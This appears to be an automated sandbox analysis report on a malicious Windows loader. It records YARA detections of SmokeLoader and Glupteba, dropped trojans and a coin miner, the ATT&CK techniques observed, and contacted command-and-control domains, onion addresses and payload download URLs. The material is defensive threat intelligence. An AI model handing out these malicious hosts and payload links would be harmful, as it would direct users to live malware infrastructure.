Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 3_2_0040CCA0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_0040CCA0

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

3_2_00429C40

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

2_2_00403532

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\latestX.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 57.2.cdttvvc.a515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.toolspub2.exe.8315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 59.2.cdttvvc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Glupteba

Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 57.2.cdttvvc.a515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.toolspub2.exe.8315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 59.2.cdttvvc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Glupteba

Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	21 Windows Management Instrumentation	11 DLL Side-Loading	11 DLL Side-Loading	1 File and Directory Permissions Modification	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	3 Native API	11 Windows Service	1 Access Token Manipulation	11 Disable or Modify Tools	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	11 Windows Service	1 Deobfuscate/Decode Files or Information	Security Account Manager	27 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Encrypted Channel			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	13 Command and Scripting Interpreter	Login Hook	813 Process Injection	4 Obfuscated Files or Information	NTDS	551 Security Software Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	1 Non-Standard Port			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Scheduled Task/Job	22 Software Packing	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	Keylogging	Scheduled Transfer	4 Non-Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	1 Service Execution	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	115 Application Layer Protocol			Service Stop	Botnet	Domain Properties
External Remote Services	1 PowerShell	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	1 Proxy			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	33 Masquerading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	813 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information
Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Indicator Removal	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Exfiltration over USB	Proxy			Network Denial of Service	Virtual Private Server	Determine Physical Locations

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Privateloader
file.exe	100%	Avira	HEUR/AGEN.1357339
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\latestX.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\cdttvvc	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\toolspub2.exe	100%	Joe Sandbox ML
C:\Windows\Temp\whxcdqscjswq.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	71%	ReversingLabs	Win64.Trojan.Amadey
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Broom.exe	21%	ReversingLabs	Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	50%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	47%	ReversingLabs	Win32.Trojan.Babar
C:\Users\user\AppData\Local\Temp\latestX.exe	71%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\toolspub2.exe	34%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\cdttvvc	34%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Temp\whxcdqscjswq.tmp	64%	ReversingLabs	Win64.PUA.DacicBitCoinMiner

Source	Detection	Scanner	Label
http://invalidlog.txtlookup	0%	URL Reputation	safe
http://host-host-file8.com/	100%	URL Reputation	malware
http://devlog.gregarius.net/docs/ua)Links	0%	URL Reputation	safe
http://www.exabot.com/go/robot)Opera/9.80	0%	URL Reputation	safe
http://www.googlebot.com/bot.html)Links	0%	URL Reputation	safe
http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0	0%	URL Reputation	safe
https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion	0%	Avira URL Cloud	safe
https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://al	0%	Avira URL Cloud	safe
https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2	0%	Avira URL Cloud	safe
http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency	0%	URL Reputation	safe
http://host-file-host6.com/	100%	URL Reputation	malware
http://grub.org)Mozilla/5.0	0%	Avira URL Cloud	safe
http://www.avantbrowser.com)MOT-V9mm/	0%	Avira URL Cloud	safe
http://crl.g	0%	URL Reputation	safe
https://blockchain.infoindex	0%	URL Reputation	safe
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize	0%	Avira URL Cloud	safe
http://www.bloglines.com)Frame	0%	Avira URL Cloud	safe
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	0%	Avira URL Cloud	safe
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:	0%	Avira URL Cloud	safe
https://allstatsin.ru	100%	Avira URL Cloud	malware
http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWARE	100%	Avira URL Cloud	malware
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion	100%	Avira URL Cloud	malware
http://lazzarotata.icu/syncUpd.exedownload_quiet	100%	Avira URL Cloud	malware
http://91.92.254.7/scripts/plus.php?ip=	0%	Avira URL Cloud	safe
http://www.broomcleaner.com/buyOpen	0%	Avira URL Cloud	safe
http://www.spidersoft.com)	0%	Avira URL Cloud	safe
https://blockstream.info/apiinva	0%	Avira URL Cloud	safe
http://https://_bad_pdb_file.pdb	0%	Avira URL Cloud	safe
http://www.google.c	0%	Avira URL Cloud	safe
https://allstatsin.ruhttps://allstatsin.ruRegQueryValueExWhttps://allstatsin.ruUUIDUUIDPGDSE64-bitNe	0%	Avira URL Cloud	safe
http://www.avantbrowser.com)MOT-V9mm/00.62	0%	Avira URL Cloud	safe
http://localhost:3433/https://duniadekho.baridna:	0%	Avira URL Cloud	safe
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://vcr4vuv4sf5233btfy7xboez	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
host-host-file8.com	95.214.26.28	true	true	unknown
xmr-eu1.nanopool.org	163.172.154.142	true	false	high
pastebin.com	172.67.34.170	true	false	high
host-file-host6.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://host-host-file8.com/	true	URL Reputation: malware	unknown
https://pastebin.com/raw/cZ2J3Upi	false		high
http://host-file-host6.com/	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C11A000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://fontawesome.io	Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmp	false		high
http://invalidlog.txtlookup	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	URL Reputation: safe	unknown
https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttps://al	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://yandex.com/bots)Opera	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://allstatsin.ru	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C09C000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://devlog.gregarius.net/docs/ua)Links	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	URL Reputation: safe	unknown
http://www.broomcleaner.com/buyOpen	Broom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://grub.org)Mozilla/5.0	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	Avira URL Cloud: safe	low
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	Avira URL Cloud: safe	unknown
http://www.avantbrowser.com)MOT-V9mm/	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWARE	InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://turnitin.com/robot/crawlerinfo.html)cannot	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://www.exabot.com/go/robot)Opera/9.80	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	URL Reputation: safe	unknown
http://www.bloglines.com)Frame	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	Avira URL Cloud: safe	low
http://api.ipify.org/?format=qqq/SILENTget1023	InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.googlebot.com/bot.html)Links	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	URL Reputation: safe	unknown
http://lazzarotata.icu/syncUpd.exedownload_quiet	InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://search.msn.com/msnbot.htm)net/http:	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	URL Reputation: safe	unknown
http://91.92.254.7/scripts/plus.php?ip=	InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.google.com/bot.html)crypto/ecdh:	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:	e0cbefcb1af40c7d4aff4aca26621a98.exe	true	Avira URL Cloud: safe	unknown
http://search.msn.com/msnbot.htm)msnbot/1.1	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
https://blockstream.info/apiinva	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	Avira URL Cloud: safe	unknown
http://www.archive.org/details/archive.org_bot)Opera/9.80	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://yandex.com/bots)Opera/9.51	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://www.spidersoft.com)	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	Avira URL Cloud: safe	low
http://www.google.com/bot.html)Mozilla/5.0	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	InstallSetup5.exe, 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmp, InstallSetup5.exe, 00000002.00000000.2101641255.000000000040A000.00000008.00000001.01000000.00000006.sdmp	false		high
http://https://_bad_pdb_file.pdb	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://allstatsin.ruhttps://allstatsin.ruRegQueryValueExWhttps://allstatsin.ruUUIDUUIDPGDSE64-bitNe	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C09C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://archive.org/details/archive.org_bot)Mozilla/5.0	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://fontawesome.io/license/	Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmp	false		high
http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	URL Reputation: safe	unknown
http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://www.google.c	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	Avira URL Cloud: safe	unknown
http://www.google.com/feedfetcher.html)HKLM	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://crl.g	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://blockchain.infoindex	e0cbefcb1af40c7d4aff4aca26621a98.exe	false	URL Reputation: safe	unknown
http://www.avantbrowser.com)MOT-V9mm/00.62	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://vcr4vuv4sf5233btfy7xboez	e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://localhost:3433/https://duniadekho.baridna:	e0cbefcb1af40c7d4aff4aca26621a98.exe	true	Avira URL Cloud: safe	low
http://search.msn.com/msnbot.htm)pkcs7:	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high
http://www.alexa.com/help/webmasters;	e0cbefcb1af40c7d4aff4aca26621a98.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
51.15.58.224	unknown	France	12876	OnlineSASFR	true
95.214.26.28	host-host-file8.com	Germany	33657	CMCSUS	true
172.67.34.170	pastebin.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1340695
